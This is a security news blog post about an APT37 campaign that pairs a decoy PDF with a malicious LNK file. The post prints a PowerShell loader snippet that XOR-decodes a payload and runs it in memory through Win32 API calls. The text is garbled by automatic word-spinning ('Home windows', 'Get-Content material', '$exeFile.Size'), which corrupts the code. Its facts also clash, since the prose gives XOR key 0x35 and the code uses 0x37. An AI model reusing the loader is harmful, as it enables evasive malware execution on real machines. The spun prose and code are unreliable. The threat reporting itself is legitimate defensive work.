Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems

Posted on August 29, 2025August 29, 2025 By CWS

Attackers have begun leveraging a seemingly innocuous PDF publication alongside a malicious Home windows shortcut (LNK) file to infiltrate enterprise environments.

The assault surfaced in late August 2025, focusing on South Korean educational and authorities establishments beneath the guise of a legit “국가정보연구회 소식지 (52호)” PDF publication.

Victims obtain an archive containing each the PDF decoy and a companion .lnk file masquerading because the publication. When the shortcut is executed, a multi‐stage PowerShell loader embedded inside the LNK unpacks and deploys extra payloads completely in reminiscence, evading disk‐primarily based detection.

Early evaluation revealed that the LNK file hides three binary payloads at exact offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a remaining executable at 0x0015AED2.

Upon execution, a PowerShell one-liner inside the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, after which kicks off a batch script (aio03.bat) to decode and run the loader.

Seqrite analysts famous that this fileless method permits the attackers to bypass signature‐primarily based defenses by by no means writing the final word payload to disk.

Subsequent investigation by Seqrite researchers recognized that the ultimate payload, as soon as decrypted with a single‐byte XOR key (0x35), is injected instantly into reminiscence by way of Home windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.

This reflective DLL injection approach ensures that the malicious code executes in a stealthy method, leaving minimal forensic artifacts.

Detailed reverse engineering of the loader binary uncovered surroundings checks for VMware instruments and sandbox evasion routines that stop execution in evaluation environments, confirming the excessive sophistication of the risk actor referred to as APT37.

Marketing campaign 1 an infection chain (Supply – Seqrite)

$exePath = “$env:temptony31.dat”
$exeFile = Get-Content material -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Size; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Size)
[Win32]::VirtualProtect($buf, $exeFile.Size, 0x40, [ref]$outdated)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Size)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)

An infection Mechanism

The an infection begins when the consumer double‐clicks the misleading .lnk file, which triggers PowerShell beneath the hood.

Marketing campaign 2 an infection chain (Supply – Seqrite)

The script parses its personal binary content material utilizing Get-Merchandise and ReadAllBytes, extracting the decoy PDF for show whereas staging the actual payloads.

As soon as staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script saved in aio02.dat, which in flip orchestrates the XOR decryption and reflective injection of aio01.dat.

By leveraging in-memory execution, the attackers sidestep typical endpoint safety platforms that depend on disk‐primarily based scanning.

This layered an infection chain, combining decoy paperwork, embedded payloads, and fileless strategies, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.

Increase your SOC and assist your group defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Compromise, File, Hackers, LNK, Malicious, PDF, Systems, Weaponize, Windows

Post navigation

Previous Post: Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication
Next Post: VerifTools Fake ID Operation Dismantled by Law Enforcement

Related Posts

DPRK’s Largest Cryptocurrency Heist via a Compromised macOS Developer and AWS Pivots Cyber Security News
Google Requires Crypto App Developers to Have License or Certification From Relevant Authorities Cyber Security News
25 Best Managed Security Service Providers (MSSP) Cyber Security News
1000+ Exposed N-able N-central RMM Servers Unpatched for 0-Day Vulnerabilities Cyber Security News
Lumma Password Stealer Attack Infection Chain and Its Escalation Tactics Uncovered Cyber Security News
Signal App Clone TeleMessage Vulnerability May Leak Passwords; Hackers Exploiting It Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • NodeBB Vulnerability Let Attackers Inject Boolean-Based Blind and PostgreSQL Error-Based Payloads
  • In Other News: Iranian Ships Hacked, Verified Android Developers, AI Used in Attacks
  • VerifTools Fake ID Operation Dismantled by Law Enforcement
  • Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems
  • Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • NodeBB Vulnerability Let Attackers Inject Boolean-Based Blind and PostgreSQL Error-Based Payloads
  • In Other News: Iranian Ships Hacked, Verified Android Developers, AI Used in Attacks
  • VerifTools Fake ID Operation Dismantled by Law Enforcement
  • Hackers Weaponize PDF Along With a Malicious LNK File to Compromise Windows Systems
  • Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News